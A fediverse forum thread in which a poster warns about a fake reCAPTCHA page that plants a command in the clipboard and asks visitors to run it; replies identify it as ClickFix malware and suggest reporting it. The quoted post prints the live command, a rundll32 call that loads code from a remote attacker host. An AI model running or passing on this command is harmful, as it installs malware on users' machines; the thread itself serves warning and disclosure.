Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (Cyborg)
  • No Skin
Collapse
Brand Logo

CIRCLE WITH A DOT

  1. Home
  2. Uncategorized
  3. At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.

At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.

Scheduled Pinned Locked Moved Uncategorized
19 Posts 18 Posters 27 Views
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • deviantollam@defcon.socialD deviantollam@defcon.social

    At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

    (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

    LOL, Would any of you ever trust a web site to:

    1. inject a long text string into your clipboard

    2. ask you to open Command Prompt

    3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

    If you're curious, this is the string it is asking users to paste and run in their command prompt...

    rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

    Link Preview Image
    xfavatax@haunted.computerX This user is from outside of this forum
    xfavatax@haunted.computerX This user is from outside of this forum
    xfavatax@haunted.computer
    wrote last edited by
    #6

    @deviantollam yes this is a hacked site/malware. ClickFix campaign.

    1 Reply Last reply
    0
    • deviantollam@defcon.socialD deviantollam@defcon.social

      At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

      (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

      LOL, Would any of you ever trust a web site to:

      1. inject a long text string into your clipboard

      2. ask you to open Command Prompt

      3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

      If you're curious, this is the string it is asking users to paste and run in their command prompt...

      rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

      Link Preview Image
      fraggle@social.coopF This user is from outside of this forum
      fraggle@social.coopF This user is from outside of this forum
      fraggle@social.coop
      wrote last edited by
      #7

      @deviantollam horrifying. I assume they're using rundll32 because Windows won't let you run an untrusted exe directly from a remote server path like that?

      1 Reply Last reply
      0
      • deviantollam@defcon.socialD deviantollam@defcon.social

        At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

        (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

        LOL, Would any of you ever trust a web site to:

        1. inject a long text string into your clipboard

        2. ask you to open Command Prompt

        3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

        If you're curious, this is the string it is asking users to paste and run in their command prompt...

        rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

        Link Preview Image
        paul_ipv6@infosec.exchangeP This user is from outside of this forum
        paul_ipv6@infosec.exchangeP This user is from outside of this forum
        paul_ipv6@infosec.exchange
        wrote last edited by
        #8

        @deviantollam

        wow... that's like telling someone to pick one of three random unlabelled liquids and chug it to get access to a food safety seminar...

        1 Reply Last reply
        0
        • deviantollam@defcon.socialD deviantollam@defcon.social

          At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

          (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

          LOL, Would any of you ever trust a web site to:

          1. inject a long text string into your clipboard

          2. ask you to open Command Prompt

          3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

          If you're curious, this is the string it is asking users to paste and run in their command prompt...

          rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

          Link Preview Image
          N This user is from outside of this forum
          N This user is from outside of this forum
          nothacking@infosec.exchange
          wrote last edited by
          #9
          @deviantollam@defcon.social Definitely malware. It's quite a common trick. (aka clickfix)
          1 Reply Last reply
          0
          • deviantollam@defcon.socialD deviantollam@defcon.social

            At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

            (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

            LOL, Would any of you ever trust a web site to:

            1. inject a long text string into your clipboard

            2. ask you to open Command Prompt

            3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

            If you're curious, this is the string it is asking users to paste and run in their command prompt...

            rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

            Link Preview Image
            nanobookreview@zirk.usN This user is from outside of this forum
            nanobookreview@zirk.usN This user is from outside of this forum
            nanobookreview@zirk.us
            wrote last edited by
            #10

            @deviantollam There's a 200% chance you're installing a virus 😆 you of all people should be able to sniff that one out.

            1 Reply Last reply
            0
            • deviantollam@defcon.socialD deviantollam@defcon.social

              At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

              (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

              LOL, Would any of you ever trust a web site to:

              1. inject a long text string into your clipboard

              2. ask you to open Command Prompt

              3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

              If you're curious, this is the string it is asking users to paste and run in their command prompt...

              rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

              Link Preview Image
              wooshell@chaosfurs.socialW This user is from outside of this forum
              wooshell@chaosfurs.socialW This user is from outside of this forum
              wooshell@chaosfurs.social
              wrote last edited by
              #11

              @deviantollam You're lucky if you haven't encountered that before. This kind of scam has been around a a few years already, often on shady "driver update" sites and the like.

              1 Reply Last reply
              0
              • deviantollam@defcon.socialD deviantollam@defcon.social

                At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

                (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

                LOL, Would any of you ever trust a web site to:

                1. inject a long text string into your clipboard

                2. ask you to open Command Prompt

                3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

                If you're curious, this is the string it is asking users to paste and run in their command prompt...

                rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

                Link Preview Image
                alphactory@www.librepunk.clubA This user is from outside of this forum
                alphactory@www.librepunk.clubA This user is from outside of this forum
                alphactory@www.librepunk.club
                wrote last edited by
                #12

                @deviantollam this is a common malware technique. They got pwned.

                1 Reply Last reply
                0
                • deviantollam@defcon.socialD deviantollam@defcon.social

                  At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

                  (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

                  LOL, Would any of you ever trust a web site to:

                  1. inject a long text string into your clipboard

                  2. ask you to open Command Prompt

                  3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

                  If you're curious, this is the string it is asking users to paste and run in their command prompt...

                  rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

                  Link Preview Image
                  arisummerland@beige.partyA This user is from outside of this forum
                  arisummerland@beige.partyA This user is from outside of this forum
                  arisummerland@beige.party
                  wrote last edited by
                  #13

                  @deviantollam Nooooo, and that totally looks like something my mom would fall for and then I would have to spend hours fixing her computer. Don't do it!

                  1 Reply Last reply
                  0
                  • deviantollam@defcon.socialD deviantollam@defcon.social

                    At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

                    (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

                    LOL, Would any of you ever trust a web site to:

                    1. inject a long text string into your clipboard

                    2. ask you to open Command Prompt

                    3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

                    If you're curious, this is the string it is asking users to paste and run in their command prompt...

                    rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

                    Link Preview Image
                    walrus@toot.walesW This user is from outside of this forum
                    walrus@toot.walesW This user is from outside of this forum
                    walrus@toot.wales
                    wrote last edited by
                    #14

                    @deviantollam

                    I wouldn't touch that with somebody else's barge-pole.

                    1 Reply Last reply
                    0
                    • deviantollam@defcon.socialD deviantollam@defcon.social

                      At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

                      (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

                      LOL, Would any of you ever trust a web site to:

                      1. inject a long text string into your clipboard

                      2. ask you to open Command Prompt

                      3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

                      If you're curious, this is the string it is asking users to paste and run in their command prompt...

                      rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

                      Link Preview Image
                      sollat@masto.aiS This user is from outside of this forum
                      sollat@masto.aiS This user is from outside of this forum
                      sollat@masto.ai
                      wrote last edited by
                      #15

                      @deviantollam
                      “You will observe and agree”? That’s not happening.

                      1 Reply Last reply
                      0
                      • deviantollam@defcon.socialD deviantollam@defcon.social

                        At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

                        (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

                        LOL, Would any of you ever trust a web site to:

                        1. inject a long text string into your clipboard

                        2. ask you to open Command Prompt

                        3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

                        If you're curious, this is the string it is asking users to paste and run in their command prompt...

                        rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

                        Link Preview Image
                        toml@defcon.socialT This user is from outside of this forum
                        toml@defcon.socialT This user is from outside of this forum
                        toml@defcon.social
                        wrote last edited by
                        #16

                        @deviantollam Oh, HELL no!

                        1 Reply Last reply
                        0
                        • deviantollam@defcon.socialD deviantollam@defcon.social

                          At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

                          (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

                          LOL, Would any of you ever trust a web site to:

                          1. inject a long text string into your clipboard

                          2. ask you to open Command Prompt

                          3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

                          If you're curious, this is the string it is asking users to paste and run in their command prompt...

                          rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

                          Link Preview Image
                          knova@lostcreek.socialK This user is from outside of this forum
                          knova@lostcreek.socialK This user is from outside of this forum
                          knova@lostcreek.social
                          wrote last edited by
                          #17

                          @deviantollam Indeed, Clickfix

                          1 Reply Last reply
                          0
                          • deviantollam@defcon.socialD deviantollam@defcon.social

                            At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised. 😮

                            (UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)

                            LOL, Would any of you ever trust a web site to:

                            1. inject a long text string into your clipboard

                            2. ask you to open Command Prompt

                            3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it 😨

                            If you're curious, this is the string it is asking users to paste and run in their command prompt...

                            rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

                            Link Preview Image
                            kravietz@agora.echelon.plK This user is from outside of this forum
                            kravietz@agora.echelon.plK This user is from outside of this forum
                            kravietz@agora.echelon.pl
                            wrote last edited by
                            #18
                            @deviantollam

                            Please report on https://safebrowsing.google.com/safebrowsin... as Malware > Web Malware
                            1 Reply Last reply
                            0
                            • deviantollam@defcon.socialD This user is from outside of this forum
                              deviantollam@defcon.socialD This user is from outside of this forum
                              deviantollam@defcon.social
                              wrote last edited by
                              #19

                              @foundthefault I'm fortunate enough to have never encountered it before. Wild.

                              1 Reply Last reply
                              0
                              • R relay@relay.publicsquare.global shared this topic
                              Reply
                              • Reply as topic
                              Log in to reply
                              • Oldest to Newest
                              • Newest to Oldest
                              • Most Votes


                              • Login

                              • Login or register to search.
                              • First post
                                Last post
                              0
                              • Categories
                              • Recent
                              • Tags
                              • Popular
                              • World
                              • Users
                              • Groups